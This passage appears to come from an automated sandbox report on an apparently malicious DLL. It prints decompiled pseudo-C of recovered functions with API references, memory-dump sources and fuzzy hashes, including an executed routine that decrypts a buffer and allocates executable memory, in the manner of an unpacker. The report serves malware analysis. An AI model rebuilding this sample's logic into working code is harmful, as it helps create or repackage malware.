                                                                                                                                                                                                                                				signed int _t54;
                                                                                                                                                                                                                                				void* _t57;
                                                                                                                                                                                                                                				intOrPtr* _t58;
                                                                                                                                                                                                                                				signed int _t64;
                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t57 = __edx;
                                                                                                                                                                                                                                				_t48 = _a4;
                                                                                                                                                                                                                                				if(_t48 != 0) {
                                                                                                                                                                                                                                					__eflags = _t48 - 2;
                                                                                                                                                                                                                                					if(_t48 == 2) {
                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                						E736DB1BE(_t48);
                                                                                                                                                                                                                                						E736DAC0B(_t48, _t57, 0, 0x736ef548, 0, 0x736ef548, 0x104);
                                                                                                                                                                                                                                						_t26 =  *0x736ef7f4; // 0x933390
                                                                                                                                                                                                                                						 *0x736ef7e4 = 0x736ef548;
                                                                                                                                                                                                                                						_v20 = _t26;
                                                                                                                                                                                                                                						__eflags = _t26;
                                                                                                                                                                                                                                						if(_t26 == 0) {
                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                							_t26 = 0x736ef548;
                                                                                                                                                                                                                                							_v20 = 0x736ef548;
                                                                                                                                                                                                                                							L8:
                                                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                                                							_v16 = 0;
                                                                                                                                                                                                                                							_t64 = E736D9191(E736D9018( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
                                                                                                                                                                                                                                							__eflags = _t64;
                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                								E736D9018( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                                                                                                                                                                                                								__eflags = _t48 - 1;
                                                                                                                                                                                                                                								if(_t48 != 1) {
                                                                                                                                                                                                                                									_v12 = 0;
                                                                                                                                                                                                                                									_push( &_v12);
                                                                                                                                                                                                                                									_t49 = E736DAAFE(_t64, _t64);
                                                                                                                                                                                                                                									__eflags = _t49;
                                                                                                                                                                                                                                									if(_t49 == 0) {
                                                                                                                                                                                                                                										_t58 = _v12;
                                                                                                                                                                                                                                										_t54 = 0;
                                                                                                                                                                                                                                										_t36 = _t58;
                                                                                                                                                                                                                                										__eflags =  *_t58;
                                                                                                                                                                                                                                										if( *_t58 == 0) {
                                                                                                                                                                                                                                											L17:
                                                                                                                                                                                                                                											_t37 = 0;
                                                                                                                                                                                                                                											 *0x736ef7e8 = _t54;
                                                                                                                                                                                                                                											_v12 = 0;
                                                                                                                                                                                                                                											_t49 = 0;
                                                                                                                                                                                                                                											 *0x736ef7ec = _t58;
                                                                                                                                                                                                                                											L18:
                                                                                                                                                                                                                                											E736DA293(_t37);
                                                                                                                                                                                                                                											_v12 = 0;
                                                                                                                                                                                                                                											L19:
                                                                                                                                                                                                                                											E736DA293(_t64);
                                                                                                                                                                                                                                											_t40 = _t49;
                                                                                                                                                                                                                                											L20:
                                                                                                                                                                                                                                											return _t40;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											goto L16;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										do {
                                                                                                                                                                                                                                											L16:
                                                                                                                                                                                                                                											_t36 = _t36 + 4;
                                                                                                                                                                                                                                											_t54 = _t54 + 1;
                                                                                                                                                                                                                                											__eflags =  *_t36;
                                                                                                                                                                                                                                										} while ( *_t36 != 0);
                                                                                                                                                                                                                                										goto L17;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t37 = _v12;
                                                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t42 = _v8 - 1;
                                                                                                                                                                                                                                								__eflags = _t42;
                                                                                                                                                                                                                                								 *0x736ef7e8 = _t42;
                                                                                                                                                                                                                                								_t43 = _t64;
                                                                                                                                                                                                                                								_t64 = 0;
                                                                                                                                                                                                                                								 *0x736ef7ec = _t43;
                                                                                                                                                                                                                                								L12:
                                                                                                                                                                                                                                								_t49 = 0;
                                                                                                                                                                                                                                								goto L19;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t44 = E736DA223(__eflags);
                                                                                                                                                                                                                                							_push(0xc);
                                                                                                                                                                                                                                							_pop(0);
                                                                                                                                                                                                                                							 *_t44 = 0;
                                                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__eflags =  *_t26;
                                                                                                                                                                                                                                						if( *_t26 != 0) {
                                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					__eflags = _t48 - 1;
                                                                                                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t45 = E736DA223(__eflags);
                                                                                                                                                                                                                                					_t66 = 0x16;
                                                                                                                                                                                                                                					 *_t45 = _t66;
                                                                                                                                                                                                                                					E736DA166();
                                                                                                                                                                                                                                					_t40 = _t66;
                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                			}


























                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                                                                                                                                                                                                                • API String ID: 0-1872383224
                                                                                                                                                                                                                                • Opcode ID: 3a115ccec3ba2cf19ce416712f01ccb0bfa3a07234034750b60847cb87de8cf8
                                                                                                                                                                                                                                • Instruction ID: e10f520f5ffcbd174ee4da33ff10d0a702636923c7cd1ec01184036597b65734
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a115ccec3ba2cf19ce416712f01ccb0bfa3a07234034750b60847cb87de8cf8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1041A471A20314ABDF12DF9AD988B9EBBFDEB89710B14006AE405DB2C4D6718B44DB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A82AE3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                                                                                                                				struct _FILETIME _v12;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                				short _t19;
                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                				short* _t26;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t24 = __edx;
                                                                                                                                                                                                                                				_t25 = E00A83037(_t11, _a12);
                                                                                                                                                                                                                                				if(_t25 == 0) {
                                                                                                                                                                                                                                					_t22 = 8;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t26 = _t25 + _a16 * 2;
                                                                                                                                                                                                                                					 *_t26 = 0;
                                                                                                                                                                                                                                					_t22 = E00A89DA2(__ecx, _a4, _a8, _t25);
                                                                                                                                                                                                                                					if(_t22 == 0) {
                                                                                                                                                                                                                                						GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                                                						_t19 = 0x5f;
                                                                                                                                                                                                                                						 *_t26 = _t19;
                                                                                                                                                                                                                                						_t22 = E00A89BAF(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					HeapFree( *0xa8d270, 0, _t25);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t22;
                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: lstrlen.KERNEL32(?,00000000,01AE9BB8,00000000,00A86F37,01AE9D96,?,?,?,?,?,69B25F44,00000005,00A8D00C), ref: 00A8303E
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: mbstowcs.NTDLL ref: 00A83067
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: memset.NTDLL ref: 00A83079
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,01AE9364), ref: 00A82B1B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,01AE9364), ref: 00A82B49
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1500278894-1536154274
                                                                                                                                                                                                                                • Opcode ID: adb93db7c0888b09421a31927a8fa33179795901f662305780a3cf1719a8c44a
                                                                                                                                                                                                                                • Instruction ID: 9882434fad3a2e82214b41cb0c85f3a66bc93f1cb68ab1a9ec6424bf60e7fe70
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adb93db7c0888b09421a31927a8fa33179795901f662305780a3cf1719a8c44a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D018F32210249BBDF216FA5DD49FEB7BB9FF84754F100026FA409A161EA72D925CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A81EBA(CHAR* _a4) {
                                                                                                                                                                                                                                				long _t9;
                                                                                                                                                                                                                                				CHAR* _t10;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t10 = 0;
                                                                                                                                                                                                                                				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
                                                                                                                                                                                                                                				if(_t9 != 0) {
                                                                                                                                                                                                                                					_t10 = E00A85157(_t9);
                                                                                                                                                                                                                                					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
                                                                                                                                                                                                                                						E00A853BB(_t10);
                                                                                                                                                                                                                                						_t10 = 0;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t10;
                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A87528,73797325), ref: 00A81ECB
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A81EE5
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentExpandHeapStrings$AllocateFree
                                                                                                                                                                                                                                • String ID: PGxt
                                                                                                                                                                                                                                • API String ID: 1564683301-789712160
                                                                                                                                                                                                                                • Opcode ID: 3740afbeb06ffdb1f66f946129ecd2bf5f9b3e9a00392e7605de6320aaa2af45
                                                                                                                                                                                                                                • Instruction ID: 76b3483cd924403b0a86354935009508570ded49284563abeb16188e1b9ec67a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3740afbeb06ffdb1f66f946129ecd2bf5f9b3e9a00392e7605de6320aaa2af45
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50E04F3260293367823276AAAC58DABDDACEF92BF03050165BD08D3621DE20CC42C7F1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                                                			E00A818B3(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                				intOrPtr* _v8;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                				intOrPtr* _t22;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                				char* _t30;
                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                				int _t42;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t17 = __eax;
                                                                                                                                                                                                                                				_t37 = 0;
                                                                                                                                                                                                                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                                                                				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                                                                				_t28 = _t2;
                                                                                                                                                                                                                                				_t34 = E00A85157(_t2);
                                                                                                                                                                                                                                				if(_t34 != 0) {
                                                                                                                                                                                                                                					_t30 = E00A85157(_t28);
                                                                                                                                                                                                                                					if(_t30 == 0) {
                                                                                                                                                                                                                                						E00A853BB(_t34);
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t39 = _a4;
                                                                                                                                                                                                                                						_t22 = E00A8A962(_t39);
                                                                                                                                                                                                                                						_v8 = _t22;
                                                                                                                                                                                                                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                                                                							_a4 = _t39;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t26 = _t22 + 2;
                                                                                                                                                                                                                                							_a4 = _t22 + 2;
                                                                                                                                                                                                                                							_t22 = E00A8A962(_t26);
                                                                                                                                                                                                                                							_v8 = _t22;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_t22 == 0) {
                                                                                                                                                                                                                                							__imp__(_t34, _a4);
                                                                                                                                                                                                                                							 *_t30 = 0x2f;
                                                                                                                                                                                                                                							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t42 = _t22 - _a4;
                                                                                                                                                                                                                                							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                                                                							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                                                                							__imp__(_t30, _v8);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *_a8 = _t34;
                                                                                                                                                                                                                                						_t37 = 1;
                                                                                                                                                                                                                                						 *_a12 = _t30;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t37;
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00A82E4A,00000000,00000000,747C81D0,01AE9618,?,?,00A821A4,?,01AE9618), ref: 00A818BF
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                  • Part of subcall function 00A8A962: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00A818ED,00000000,00000001,00000001,?,?,00A82E4A,00000000,00000000,747C81D0,01AE9618), ref: 00A8A970
                                                                                                                                                                                                                                  • Part of subcall function 00A8A962: StrChrA.SHLWAPI(?,0000003F,?,?,00A82E4A,00000000,00000000,747C81D0,01AE9618,?,?,00A821A4,?,01AE9618,0000EA60,?), ref: 00A8A97A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00A82E4A,00000000,00000000,747C81D0,01AE9618,?,?,00A821A4), ref: 00A8191D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,747C81D0), ref: 00A8192D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00A81939
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3767559652-0
                                                                                                                                                                                                                                • Opcode ID: 5c481cecbde0b3030759ee39bb82bbc6a6fdf19275a6246d5d17eb1f0f96c83a
                                                                                                                                                                                                                                • Instruction ID: 81b5d13618d1826457e4ac624768a18b497b19a89683fe1a812501b64b7a68e3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c481cecbde0b3030759ee39bb82bbc6a6fdf19275a6246d5d17eb1f0f96c83a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE21B772904255EBCB117FB4CC58A9A7FBDAF06794F154054F9459B201D731CA02C7A1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A81FCE(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				int _t25;
                                                                                                                                                                                                                                				int _t29;
                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t29 = lstrlenW(_a4);
                                                                                                                                                                                                                                				_t25 = lstrlenW(_a8);
                                                                                                                                                                                                                                				_t18 = E00A85157(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                                                                				_v8 = _t18;
                                                                                                                                                                                                                                				if(_t18 != 0) {
                                                                                                                                                                                                                                					_t34 = _t29 + _t29;
                                                                                                                                                                                                                                					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                                                                					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                                                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,01AE9364,?,00A829B1,004F0053,01AE9364,?,?,?,?,?,?,00A8A080), ref: 00A81FDE
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00A829B1,?,00A829B1,004F0053,01AE9364,?,?,?,?,?,?,00A8A080), ref: 00A81FE5
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,00A829B1,004F0053,01AE9364,?,?,?,?,?,?,00A8A080), ref: 00A82005
                                                                                                                                                                                                                                • memcpy.NTDLL(747869A0,00A829B1,00000002,00000000,004F0053,747869A0,?,?,00A829B1,004F0053,01AE9364), ref: 00A82018
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2411391700-0
                                                                                                                                                                                                                                • Opcode ID: 2bfb76ec13afcbe0812c1fc5b359b243a106ab86dd3da84848f28af071d8772c
                                                                                                                                                                                                                                • Instruction ID: 2df7b1d14bed73d167f3e4d444f941162695cb854219529971080f909b3f5540
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bfb76ec13afcbe0812c1fc5b359b243a106ab86dd3da84848f28af071d8772c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDF0E776900119FBCB11EFA9CC89CDEBBADEF493947154066B90897212E631EA14DBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(01AE9B98,00000000,00000000,770CC740,00A8A73F,00000000), ref: 00A82639
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A82641
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,01AE9B98), ref: 00A82655
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A82660
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 74227042-0
                                                                                                                                                                                                                                • Opcode ID: 9c3bb96d79d278814c55d31245602eccec97228d5e5069dae4ae3e8ad7d98cef
                                                                                                                                                                                                                                • Instruction ID: 5e46788e8fd7cb731170e61a400d92086d8ad78351ae35de9ed63ce080671356
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c3bb96d79d278814c55d31245602eccec97228d5e5069dae4ae3e8ad7d98cef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DE01273901621A7C711EBE4AC4CC5BBBBDEF897A17040416F600D7111C73599068FF1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(0000000E,0000AA01,00003000,00000004), ref: 736D6265
                                                                                                                                                                                                                                • CryptImportKey.ADVAPI32(?,00000208,0000002C,00000000,00000001,?), ref: 736D639B
                                                                                                                                                                                                                                • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,0000AA00), ref: 736D63BD
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,0000AA00,00003000,00000004), ref: 736D63D2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocCryptVirtual$DecryptImport
                                                                                                                                                                                                                                • String ID: $KERNEL32.dll
                                                                                                                                                                                                                                • API String ID: 4282381441-467793799
                                                                                                                                                                                                                                • Opcode ID: 9a6b8925297998a43b4e4889ef56a4b9ac77028094b6dfea98cd446c2ca662fa
                                                                                                                                                                                                                                • Instruction ID: f0fa7c921dd1f86e776c8aa6a29a920ccb5ffd890efd8f7f25b12171d1663752
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a6b8925297998a43b4e4889ef56a4b9ac77028094b6dfea98cd446c2ca662fa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE81D231E043588FDB01CFA8CA44BADBBB5FB59304F24829DD948AB286DB719945CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,7614F7F0,00000000,761536A0), ref: 736D6C56
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID: zdms
                                                                                                                                                                                                                                • API String ID: 4275171209-1934084468
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E736D700B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                				signed int _t41;
                                                                                                                                                                                                                                				signed int _t45;
                                                                                                                                                                                                                                				signed char _t54;
                                                                                                                                                                                                                                				signed int _t56;
                                                                                                                                                                                                                                				signed int _t58;
                                                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                				signed int _t72;
                                                                                                                                                                                                                                				signed int _t76;
                                                                                                                                                                                                                                				signed int _t80;
                                                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t68 = __edx;
                                                                                                                                                                                                                                				_push(0x10);
                                                                                                                                                                                                                                				_push(0x736e9a08);
                                                                                                                                                                                                                                				E736D7870(__ebx, __edi, __esi);
                                                                                                                                                                                                                                				_t34 =  *0x736ef120; // 0x1
                                                                                                                                                                                                                                				if(_t34 > 0) {
